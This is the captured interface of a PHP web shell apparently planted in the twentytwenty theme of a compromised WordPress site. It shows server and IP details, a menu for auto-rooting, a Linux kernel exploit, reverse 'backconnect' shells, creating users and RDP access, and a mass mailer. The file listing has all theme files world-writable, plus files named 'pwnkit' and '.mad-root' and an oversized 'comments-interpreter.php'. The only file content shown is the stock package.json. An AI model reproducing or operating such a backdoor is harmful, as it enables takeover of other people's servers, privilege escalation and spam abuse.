Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
themes /
twentytwenty /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
classes
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
.htaccess
237
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
404-xml.php
546
B
-rwxrwxrwx
404.php
813
B
-rwxrwxrwx
comments-interpreter-query.php
546
B
-rwxrwxrwx
comments-interpreter.php
181.15
KB
-rwxrwxrwx
comments.php
3.13
KB
-rwxrwxrwx
footer.php
1.95
KB
-rwxrwxrwx
functions.php
27.23
KB
-rwxrwxrwx
header.php
4.96
KB
-rwxrwxrwx
index.php
2.9
KB
-rwxrwxrwx
package-lock.json
455.06
KB
-rwxrwxrwx
package.json
1.93
KB
-rwxrwxrwx
print.css
2.64
KB
-rwxrwxrwx
pwnkit
0
B
-rwxr-xr-x
readme.txt
4.77
KB
-rwxrwxrwx
screenshot.png
51.82
KB
-rwxrwxrwx
searchform.php
1.73
KB
-rwxrwxrwx
singular-url.php
0
B
-rwxrwxrwx
singular.php
550
B
-rwxrwxrwx
style-rtl.css
117.87
KB
-rwxrwxrwx
style.css
118.86
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "twentytwenty", "version": "2.2.0", "description": "Default WP Theme", "author": "The WordPress Contributors", "license": "GPL-2.0-or-later", "keywords": [ "WordPress", "Theme", "TwentyTwenty" ], "homepage": "https://wordpress.org/themes/twentytwenty/", "bugs": { "url": "https://core.trac.wordpress.org/" }, "devDependencies": { "@wordpress/browserslist-config": "^5.9.0", "@wordpress/scripts": "^24.6.0", "autoprefixer": "^10.4.13", "concurrently": "^7.6.0", "postcss": "^8.4.21", "postcss-cli": "^10.1.0", "rtlcss": "^4.0.0", "stylelint-a11y": "^1.2.3" }, "browserslist": [ "extends @wordpress/browserslist-config" ], "rtlcssConfig": { "options": { "autoRename": false, "autoRenameStrict": false, "clean": true, "greedy": false, "processUrls": false, "stringMap": [] }, "plugins": [], "map": false }, "scripts": { "build": "npm run build:vendor-prefixes && npm run build:rtl", "build:rtl": "concurrently \"npm run build:rtl-style\" \"npm run build:rtl-esb\" \"npm run build:rtl-esc\"", "build:rtl-style": "rtlcss style.css style-rtl.css", "build:rtl-esb": "rtlcss assets/css/editor-style-block.css assets/css/editor-style-block-rtl.css", "build:rtl-esc": "rtlcss assets/css/editor-style-classic.css assets/css/editor-style-classic-rtl.css", "build:vendor-prefixes": "concurrently \"npm run build:vendor-prefixes-style\" \"npm run build:vendor-prefixes-esb\" \"npm run build:vendor-prefixes-esc\"", "build:vendor-prefixes-style": "postcss -r --no-map style.css assets/css/editor-style-block.css assets/css/editor-style-classic.css", "build:vendor-prefixes-esb": "postcss -r --no-map assets/css/editor-style-block.css ", "build:vendor-prefixes-esc": "postcss -r --no-map assets/css/editor-style-classic.css", "lint:css": "wp-scripts lint-style 'style.css' 'assets/**/*.css'", "lint:js": "wp-scripts lint-js 'assets/**/*.js'", "lint:pkg-json": "wp-scripts lint-pkg-json" } }
Close